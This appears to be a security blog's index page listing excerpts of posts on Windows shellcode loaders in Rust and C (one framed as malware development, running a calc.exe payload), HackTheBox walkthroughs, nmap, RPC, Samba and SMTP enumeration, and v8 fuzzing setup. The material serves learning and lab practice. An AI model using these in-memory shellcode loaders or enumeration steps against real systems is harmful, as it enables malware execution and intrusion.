Executing functions in Rust with winapi

Motivation
I want to know how to allocate memory on Windows and execute code in buffers.
winapi
winapi provides raw FFI bindings to all of the Windows API, so I will use this crate.
code
When I run the command cargo run, calc.exe pops up.
use std::mem::transmute;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::processthreadsapi::CreateThread;
use winapi::um::synchapi::WaitForSingleObject;
fn main() {
    let buffer: [u8; 276] = [
        0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
        0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
    ];
    unsafe {
        let baseptr = VirtualAlloc(std::ptr::null_mut(), buffer....

June 4, 2023 · 2 min · 388 words · FAMASoon

Connect to Ldap3 with Rust

What is LDAP
LDAP stands for Lightweight Directory Access Protocol. It is an open and platform-independent protocol used for accessing and maintaining directory services over a network. Directory services store and organize information, such as user names, passwords, email addresses, and other attributes, in a hierarchical structure. LDAP is commonly used in client-server applications and network environments to facilitate centralized management of user authentication, authorization, and directory information. It allows clients to search, modify, and retrieve data from a directory server, which stores the directory information....

June 1, 2023 · 2 min · 310 words · FAMASoon

Maldev - implant payload

Shellcode
One way for malware to embed code is to deploy shellcode in memory. This time, we will check the method that works on Windows. Note that getchar() is used so that the debugger can attach to the process accordingly and check the memory.
.text
payload is the shellcode. To embed arbitrary shellcode in a .text section, do the following.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // Shellcode in text section
    unsigned char payload[] = {
        0x90,  // NOP
        0x90,  // NOP
        0xcc,  // INT3
        0xc3   // RET
    };
    unsigned int payload_len = 4;

    // Allocate a memory buffer for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
    printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

    // Copy payload to new buffer
    RtlMoveMemory(exec_mem, payload, payload_len);

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    printf("\nHit me!...

May 28, 2023 · 2 min · 370 words · FAMASoon

HackTheBox Walkthrough - Brainf**k

This post is a writeup of the HackTheBox machine Brainf**k: https://app.hackthebox.com/machines/Brainfuck
Nmap
Nmap result
$ nmap -sC -sV 10.10.10.17
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-09 06:39 EDT
Nmap scan report for 10.10.10.17
Host is up (0.072s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 94d0b334e9a537c5acb980df2a54a5f0 (RSA)
|   256 6bd5dc153a667af419915d7385b24cb2 (ECDSA)
|_  256 23f5a333339d76d5f2ea6971e34e8e02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) TOP RESP-CODES UIDL CAPA AUTH-RESP-CODE PIPELINING USER
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: LITERAL+ AUTH=PLAINA0001 capabilities LOGIN-REFERRALS have post-login listed SASL-IR IDLE ENABLE OK more IMAP4rev1 Pre-login ID
443/tcp open  ssl/http nginx 1....

May 10, 2023 · 13 min · 2756 words · FAMASoon

HackTheBox Nibbles Walkthrough

Nibbles
IP address : 10.10.10.75
Nmap result
$ nmap -sV -sT -sC 10.10.10.75
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 05:59 EST
Nmap scan report for 10.10.10.75
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open  http    Apache httpd 2....

January 8, 2023 · 54 min · 11329 words · FAMASoon

nmap cheat sheet

Nmap cheat sheet
$ nmap <scan types> <options> <target>
-sn : Disables port scanning.
-oA tnet : Stores the results in all formats, starting with the name 'tnet'.
-iL : Performs the defined scans against the targets in the provided 'hosts.lst' list.
-PE : Performs the ping scan by using 'ICMP Echo requests' against the target.
--packet-trace : Shows all packets sent and received.
--reason : Displays the reason for a specific result.
--top-ports=10 : Scans the specified top ports that have been defined as most frequent....

January 8, 2023 · 2 min · 240 words · FAMASoon

rpc enumeration

RPC Client
RPC client
$ rpcclient -U "" 10.129.14.128
Enter WORKGROUP\'s password:
rpcclient$>
rpcclient$> srvinfo
        DEVSMB         Wk Sv PrQ Unx NT SNT DEVSM
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03
rpcclient$> enumdomains
name:[DEVSMB] idx:[0x0]
name:[Builtin] idx:[0x1]
rpcclient$> querydominfo
Domain:         DEVOPS
Server:         DEVSMB
Comment:        DEVSM
Total Users:    2
Total Groups:   0
Total Aliases:  0
Sequence No:    1632361158
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
rpcclient$> netshareenumall
netname: print$
        remark: Printer Drivers
        path:   C:\var\lib\samba\printers
        password:
netname: home
        remark: INFREIGHT Samba
        path:   C:\home\
        password:
netname: dev
        remark: DEVenv
        path:   C:\home\sambauser\dev\
        password:
netname: notes
        remark: CheckIT
        path:   C:\mnt\notes\
        password:
netname: IPC$
        remark: IPC Service (DEVSM)
        path:   C:\tmp
        password:
rpcclient$> netsharegetinfo notes
netname: notes
        remark: CheckIT
        path:   C:\mnt\notes\
        password:
        type:   0x0
        perms:  0
        max_uses:       -1
        num_uses:       1
revision: 1
type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE
DACL
        ACL     Num ACEs:       1       revision:       2
        ---
        ACE
                type: ACCESS ALLOWED (0) flags: 0x00
                Specific bits: 0x1ff
                Permissions: 0x101f01ff: Generic all access SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS
                SID: S-1-1-0
rpcclient$> enumdomusers
user:[mrb3n] rid:[0x3e8]
user:[cry0l1t3] rid:[0x3e9]
rpcclient$> queryuser 0x3e9
        User Name   :   cry0l1t3
        Full Name   :   cry0l1t3
        Home Drive  :   \\devsmb\cry0l1t3
        Dir Drive   :
        Profile Path:   \\devsmb\cry0l1t3\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Do, 01 Jan 1970 01:00:00 CET
        Logoff Time              :      Mi, 06 Feb 2036 16:06:39 CET
        Kickoff Time             :      Mi, 06 Feb 2036 16:06:39 CET
        Password last set Time   :      Mi, 22 Sep 2021 17:50:56 CEST
        Password can change Time :      Mi, 22 Sep 2021 17:50:56 CEST
        Password must change Time:      Do, 14 Sep 30828 04:48:05 CEST
        unknown_2[0....

January 8, 2023 · 3 min · 630 words · FAMASoon

Samba enumeration

Samba
samba
$ cat /etc/samba/smb.conf | grep -v "#\|\;"
[global]
   workgroup = DEV.INFREIGHT.HTB
   server string = DEVSMB
   log file = /var/log/samba/log.%m
   max log size = 1000
   logging = file
   panic action = /usr/share/samba/panic-action %d
   server role = standalone server
   obey pam restrictions = yes
   unix password sync = yes
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
   pam password change = yes
   map to guest = bad user
   usershare allow guests = yes
[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
Setting : Description
[sharename] : The name of the network share.
workgroup = WORKGROUP/DOMAIN : The workgroup that is shown when clients run a query.
path = /path/here/ : The directory to which the user is granted access.
server string = STRING : The string that is shown when a connection is started.
unix password sync = yes : Synchronize the UNIX password with the SMB password?...

January 8, 2023 · 3 min · 448 words · FAMASoon

SMTP enumeration

SMTP
SMTP sending and communication are also carried out through special commands that make the SMTP server execute the user's requests.
Command : Description
AUTH PLAIN : AUTH is a service extension used to authenticate the client.
HELO : The client logs in with its computer name and starts the session.
MAIL FROM : The client names the sender of the email.
RCPT TO : The client names the recipient of the email.
DATA : The client starts sending the email.
RSET : The client aborts the transmission it started, but keeps the connection between client and server.
VRFY : The client checks whether a mailbox is available for message transfer.
EXPN : With this command the client also checks whether a mailbox is available for messaging.
NOOP : The client requests a response from the server to prevent disconnection due to a timeout.
QUIT : The client ends the session.
$ telnet 10.129.14.128 25
Trying 10.129.14.128...
Connected to 10.129.14.128.
Escape character is '^]'.
220 ESMTP Server
HELO mail1.inlanefreight.htb
250 mail1.inlanefreight.htb
EHLO mail1
250-mail1.inlanefreight.htb
250-PIPELINING
250-SIZE 10240000
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
$ telnet 10.129.14.128 25
Trying 10.129.14.128...
Connected to 10....

January 8, 2023 · 3 min · 433 words · FAMASoon

[Note] How to build v8 for AFL

I built v8 to run fuzzing in AFL.
First, install depot_tools using the link below, and then download the v8 source code.
https://v8.dev/docs/source-code
Next, create an afl directory in the v8/third_party directory and download the contents of the following link into it.
https://chromium.googlesource.com/chromium/src/+/refs/heads/master/third_party/afl/
Next, go to the v8 directory and execute the following commands.
gn gen out/libfuzzer '--args=use_afl=true is_asan=true optimize_for_fuzzing = true ' --check
ninja -C out/libfuzzer d8
afl-fuzz -D -i third_party/afl/src/testcases/others/js/ -o fuzzout -M fuzz1 ....

August 23, 2022 · 1 min · 100 words · FAMASoon